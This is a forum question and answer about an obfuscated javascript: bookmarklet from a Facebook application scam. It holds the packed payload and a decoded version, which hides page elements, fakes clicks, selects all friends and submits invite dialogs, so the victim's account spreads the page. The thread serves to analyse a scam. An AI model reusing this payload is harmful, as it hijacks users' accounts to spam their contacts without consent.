# Obfuscated Javascript Code from Facebook Application?

Tags: javascript, facebook, obfuscation, packing, unpack

This is the code that was copied and pasted into my address bar:

```
javascript:(function()

{a='app117970624901700_jop';b='app117970624901700_jode';ifc='app117970624901700_ifc';ifo='app1179

70624901700_ifo';mw='app117970624901700_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return

(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String))

{while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])

p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=

["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N

\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\

p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g

\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\

\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d

[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e

[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e

[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x

70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|

mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
```

I ran it through http://jsbeautifier.org/ , but it didn't clean up the later part dealing with the "new RegExp"... anyone know what this code does and how to figure it out?

Answer (score 2):

```
document.getElementById('app117970624901700_mwrapper').style.visibility='hidden';
document.getElementById('app117970624901700_jop').innerHTML=document.getElementById('app117970624901700_jode').value;

s=document.getElementById('suggest');
m=document.getElementById('likeme');

c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);

setTimeout(function(){
    fs.select_all()
}, 5000);

setTimeout(function(){
    SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);

setTimeout(function(){
    m.dispatchEvent(c);
    document.getElementById('app117970624901700_ifo').innerHTML=document.getElementById('app117970624901700_ifc').value
}, 5000);
```

Comment: If you're still wondering, this basically "suggests" the page to all of your friends.

Comment: Wow. Obfuscation indeed! Thanks for the answers! 

How did you arrive at it though? How can I evaluate the RegExp? I assume that is where all the "sensible" code came from.

Comment: @V.K. I simply just googled and copy pasted from pastebin.org